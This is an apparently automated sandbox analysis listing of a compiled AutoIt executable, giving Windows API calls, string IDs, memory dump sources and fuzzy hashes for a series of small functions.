                                              APIs
                                              • __snwprintf.LIBCMT ref: 00BC3A66
                                                • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                              Strings
                                              Similarity
                                              • API ID: __snwprintf_memmove
                                              • String ID: , $$AUTOITCALLVARIABLE%d
                                              • API String ID: 3506404897-2584243854
                                              • Opcode ID: 6a380eda821be52862eabbdf852cc0561d31c75f265d88b1ce22227728f8a5fa
                                              • Instruction ID: 926ce9b5aba25c0c330b4996a621f99b9cc593c0b07114f68c574f9f1cc37ac8
                                              • Opcode Fuzzy Hash: 6a380eda821be52862eabbdf852cc0561d31c75f265d88b1ce22227728f8a5fa
                                              • Instruction Fuzzy Hash: ED218C71700219AACF14EF64CC82FAE77F5EF48700F4084E9F945AB281DA30EA59CB61
                                              APIs
                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00BD6761
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BD676C
                                              Strings
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: Combobox
                                              • API String ID: 3850602802-2096851135
                                              • Opcode ID: 0cde7445c740b3113027285d1cb2c28290cfefa86b43c0cc0570061d2ab66f51
                                              • Instruction ID: f37654120aac28c6a340181e563cbef4a07a85dd992ffa248dba4cb516abaa8c
                                              • Opcode Fuzzy Hash: 0cde7445c740b3113027285d1cb2c28290cfefa86b43c0cc0570061d2ab66f51
                                              • Instruction Fuzzy Hash: 4F119071300209AFEF15CF54CC81EABB7AAEB983A8F10416AF91497391E635DC5187A0
                                              APIs
                                                • Part of subcall function 00B51D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B51D73
                                                • Part of subcall function 00B51D35: GetStockObject.GDI32(00000011), ref: 00B51D87
                                                • Part of subcall function 00B51D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B51D91
                                              • GetWindowRect.USER32(00000000,?), ref: 00BD6C71
                                              • GetSysColor.USER32(00000012), ref: 00BD6C8B
                                              Strings
                                              Similarity
                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                              • String ID: static
                                              • API String ID: 1983116058-2160076837
                                              • Opcode ID: bc81ecbc88c7368ff073d5ea03b33a5aa191c6513b6fb3a203e946ba13cb9b14
                                              • Instruction ID: 466386e1cace4c381d7fc4a2fe2c88c3ad7024bc50b04fc2b8711d2447821327
                                              • Opcode Fuzzy Hash: bc81ecbc88c7368ff073d5ea03b33a5aa191c6513b6fb3a203e946ba13cb9b14
                                              • Instruction Fuzzy Hash: 4B211A7262020AAFDB04DFA8CC45AFABBE8FB08315F044569FD55D3250E635E850DB60
                                              APIs
                                              • GetWindowTextLengthW.USER32(00000000), ref: 00BD69A2
                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00BD69B1
                                              Strings
                                              Similarity
                                              • API ID: LengthMessageSendTextWindow
                                              • String ID: edit
                                              • API String ID: 2978978980-2167791130
                                              • Opcode ID: 2673d650f51f1f12aa7e4ed911aeff428096bf8294fceca37710ddcfd3f879e1
                                              • Instruction ID: db45d9faa89389073e63347dcfaec7434a9e2891f5eaf764d512495cfe36dd8c
                                              • Opcode Fuzzy Hash: 2673d650f51f1f12aa7e4ed911aeff428096bf8294fceca37710ddcfd3f879e1
                                              • Instruction Fuzzy Hash: F9119D71100109ABEB108E649C60AFBB7A9EB19378F504766F9A1972E0E739DC509760
                                              APIs
                                              • _memset.LIBCMT ref: 00BB2A22
                                              • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00BB2A41
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              Similarity
                                              • API ID: InfoItemMenu_memset
                                              • String ID: 0
                                              • API String ID: 2223754486-4108050209
                                              • Opcode ID: e5fa24d8b16200bf6359a011e8c6e1a966022f97092022c0fc64035b1b668513
                                              • Instruction ID: 7e2c00222a29e0f5276e1f26d8530223b34ac3ef30a97d4928e4d6b0e729e693
                                              • Instruction Fuzzy Hash: D9119072901114EBDB35EB98DC44BFE77E8EB86314F1440A1E859E7290D7B0AD0ACB92
                                              APIs
                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00BC222C
                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00BC2255
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              Similarity
                                              • API ID: Internet$OpenOption
                                              • String ID: <local>
                                              • API String ID: 942729171-4266983199
                                              • Opcode ID: 7f81a6045521b15a2027f6f98b5a4047911bc91a814b4494825d127dc1312507
                                              • Instruction ID: 7e543f8c405227b18426c216c04ec2b434db76804af2c48ad099cb98ba4e1d4e
                                              • Instruction Fuzzy Hash: AE11CE70501226BADB298F118C84FFAFBE8FB06361F10826EF9059A000E2705D80D6F0
                                              APIs
                                                • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                • Part of subcall function 00BAAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00BAAABC
                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00BA8E73
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              Similarity
                                              • API ID: ClassMessageNameSend_memmove
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 372448540-1403004172
                                              • Opcode ID: ef028c78aacb7baf6cac9d3f29ea0c62af09764b6934bb3ca892b19e5cfe5428
                                              • Instruction ID: bf7f5557e49c6cace960f772e058fa56a64f5481f94ab5ad0401f0794fc61e5d
                                              • Instruction Fuzzy Hash: 9B01F5B1A49219EBCB15EBA0CC919FE73E8EF06320B0046A9BC21672E1DE35580CC660
                                              APIs
                                                • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                • Part of subcall function 00BAAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00BAAABC
                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 00BA8D6B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              Similarity
                                              • API ID: ClassMessageNameSend_memmove
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 372448540-1403004172
                                              • Opcode ID: f73d6cc4103e42e58f911f6834a7dd0a1473d1443485ac5bbbc020f34eba2661
                                              • Instruction ID: 296a4ebf55f41b78ca4582888f35d796164f0de5b4b232a48e7111c88aa3d984
                                              • Instruction Fuzzy Hash: F001D4B1B45109ABCB15EBA0C996AFE73E8DF16300F1041B9B842672E1DE255E0CD271
                                              APIs
                                                • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                • Part of subcall function 00BAAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00BAAABC
                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 00BA8DEE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              Similarity
                                              • API ID: ClassMessageNameSend_memmove
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 372448540-1403004172
                                              • Opcode ID: 5d664bc712452af02411774c74a77029d1fc76992dcabac93f0708f3e3f706fc
                                              • Instruction ID: d000c5a8d6399b993819b24f87c94642722d2523dfab1dd73b17bb7539049d9c
                                              • Instruction Fuzzy Hash: 6201F2B1B49109A7CB25EAA4C992AFE77E8CF16300F1041A9BC42772E2DE255E0CD271
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              Similarity
                                              • API ID: ClassName_wcscmp
                                              • String ID: #32770
                                              • API String ID: 2292705959-463685578
                                              • Opcode ID: 9d5588cc54a79ba0b28fa21a96282c491df56c430ffa6975f09b84fc2333f48f
                                              • Instruction ID: 628a162c51e579d7371e2d40d5c8919743a72f94ae03802b84c1a15a9c0a0d34
                                              • Instruction Fuzzy Hash: DCE09232A042292BE7209A99AC4ABF7FBECEB55B60F004067FD44D3051EA709A45C7E0
                                              APIs
                                                • Part of subcall function 00B8B314: _memset.LIBCMT ref: 00B8B321
                                                • Part of subcall function 00B70940: InitializeCriticalSectionAndSpinCount.KERNEL32(00C14158,00000000,00C14144,00B8B2F0,?,?,?,00B5100A), ref: 00B70945
                                              • IsDebuggerPresent.KERNEL32(?,?,?,00B5100A), ref: 00B8B2F4
                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00B5100A), ref: 00B8B303
                                              Strings
                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00B8B2FE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              Similarity
                                              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                              • API String ID: 3158253471-631824599
                                              • Opcode ID: 3f75a0ec547363a3bd2b709e4d4155d8461b2403fe3b2b2d549ceb32d9e7a6f5
                                              • Instruction ID: 102c37c2372bfff6491d8dc6aabe280b960b9cb8df58230c8d3c8ba750d8b383
                                              • Instruction Fuzzy Hash: C4E06D71600702CBD720AF38E814756BBE4BF04314F0489ADF856C76A1EBB4D408CBA1
                                              APIs
                                              • GetSystemDirectoryW.KERNEL32(?), ref: 00B91775
                                                • Part of subcall function 00BCBFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00B9195E,?), ref: 00BCBFFE
                                                • Part of subcall function 00BCBFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00BCC010
                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00B9196D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              Similarity
                                              • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                              • String ID: WIN_XPe
                                              • API String ID: 582185067-3257408948
                                              • Opcode ID: 900aa5e76ae8ddf3c619df22ed70853d394802e493ba22653af3dd559766a96b
                                              • Instruction ID: 3cd40d19ead060c6bbd18cc40185eb09339770a56686d1aeb62c1d5b8c0557f1
                                              • Instruction Fuzzy Hash: 04F0A5B080510ADFDB15DB95C9D4BECBBF8AB08301F5404EAE102A31A0DB758F84EF60
                                              APIs
                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00BD59AE
                                              • PostMessageW.USER32(00000000), ref: 00BD59B5
                                                • Part of subcall function 00BB5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00BB52BC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              Similarity
                                              • API ID: FindMessagePostSleepWindow
                                              • String ID: Shell_TrayWnd
                                              • API String ID: 529655941-2988720461
                                              • Opcode ID: 7d3b6ee2a4b2e82890288b473f05a1a47f57cc58cea6f5bd55af92b9e5f90436
                                              • Instruction ID: c57dec13077628148c3b280427c63425869734b6139e0af1890d3f916be4ee82
                                              • Instruction Fuzzy Hash: 8CD0C9313863127BEA64BB70AC1BFE6A655BB14B50F040836B346AB1D0DDE0A800C658
                                              APIs
                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00BD596E
                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00BD5981
                                                • Part of subcall function 00BB5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00BB52BC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              Similarity
                                              • API ID: FindMessagePostSleepWindow
                                              • String ID: Shell_TrayWnd
                                              • API String ID: 529655941-2988720461
                                              • Opcode ID: 22db542f2a627c30a0674039e0b8cf433f97ca57b7f429359969414a52b969a1
                                              • Instruction ID: 8f69f5b97d33bf3c161b63b9b85ab2f5661cb8f956bf7db0aca94365f5f5670e
                                              • Instruction Fuzzy Hash: BAD0C935389312B7EA64BB70AC2BFE6AA55BB10B50F040836B34AAB1D0DDE0A800C654